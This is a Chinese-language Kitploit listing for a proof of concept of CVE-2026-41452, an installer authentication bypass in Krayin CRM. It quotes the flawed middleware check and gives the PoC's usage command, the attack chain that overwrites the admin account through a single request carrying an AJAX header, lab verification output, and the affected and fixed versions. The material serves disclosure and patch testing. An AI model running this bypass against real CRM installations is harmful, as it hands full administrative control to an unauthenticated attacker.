Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-41452-PoC — CVE-2026-41452 — Krayin CRM 未授权安装程序绕过(X-Requested-With)→ 管理员接管。已验证:在 2.2.4 上可覆盖并登录,在 2.2.5 上已阻止 | Kitploit
工具/GitHubGitHub/boreas37/cve-2026-41452-poc
身份验证与授权漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubboreas37/cve-2026-41452-poc

CVE-2026-41452-PoC

CVE-2026-41452 — Krayin CRM 未授权安装程序绕过(X-Requested-With)→ 管理员接管。已验证:在 2.2.4 上可覆盖并登录,在 2.2.5 上已阻止

查看仓库
4131个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-41452 — Krayin CRM 安装程序认证绕过 → 管理员接管

CVSS 9.8(严重) · CWE-287 / CWE-306 · Jiva 分析文章 · VulnCheck

摘要

Krayin CRM 的安装程序暴露了 POST /install/api/admin-config-setup(以及 run-migration、 run-seeder)接口,但没有 CSRF 保护(withoutMiddleware('web') 组)。CanInstall 全局中间件仅对非 AJAX 请求拦截该路由:

// app/Http/Middleware/CanInstall.php
if ($this->isAlreadyInstalled() && ! $request->ajax()) {
    return redirect()->route('admin.dashboard');
}

发送 X-Requested-With: XMLHttpRequest 即可完全绕过该检查。控制器随后 使用 updateOrInsert 将硬编码的主管理员(用户 id=1)替换为攻击者提供的 name/email/password(role_id=1、status=1)→ 在已安装的实例上实现未认证的完全管理员接管。

受影响版本: ≤ 2.2.0 和 2.2.4(回归)。已修复:2.2.1(e4eb96f5),在 2.2.4 中回归 (6a7bc4cc),在 2.2.5 中重新修复(ea4919a8)。master 在调研时仍然存在漏洞。

漏洞利用

python3 poc_cve-2026-41452.py http://TARGET newadmin [email protected] 'NewPass@123'

攻击链:

  1. 基线:非 AJAX POST → 被拦截(302 重定向)— 证明中间件对正常请求有效
  2. AJAX POST X-Requested-With: XMLHttpRequest → HTTP 200 1 → 管理员(id=1)被覆盖
  3. 使用新凭据登录 /admin/login → 重定向到 /admin/dashboard
  4. 仪表盘渲染 → 确认接管

验证(2026-08-12,Docker 实验室,ARM64)

[0] NON-AJAX POST -> HTTP 302 (blocked by CanInstall)        [OK control]
[1] AJAX POST /install/api/admin-config-setup -> HTTP 200 '1' [OK overwrite]
[2] login [email protected] -> HTTP 302 /admin/dashboard          [OK]
[3] GET /admin/dashboard -> HTTP 200 (full dashboard)          [OK]
=== VERDICT: CVE-2026-41452 EXPLOITABLE ===

已修复版本对比:使用 v2.2.5 文件时,相同的 AJAX POST → HTTP 403(被拦截)。

影响

任何可公开访问的 Krayin CRM 安装(v2.2.4 或 ≤2.2.0)都可能被未认证的攻击者 通过一次请求完全接管。无需 CSRF、无需凭据、无需用户交互。

参考资料

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-41452
  • Jiva Security 分析文章:https://jivasecurity.com/writeups/krayin-installer-bypass-account-takeover-cve-2026-41452
  • VulnCheck 安全通告:https://www.vulncheck.com/advisories/krayin-crm-missing-authentication-via-install-api-admin-config-setup
  • 修复:ea4919a8(v2.2.5)· 回归:6a7bc4cc(v2.2.4)· 首次修复:e4eb96f5(v2.2.1)
下载工具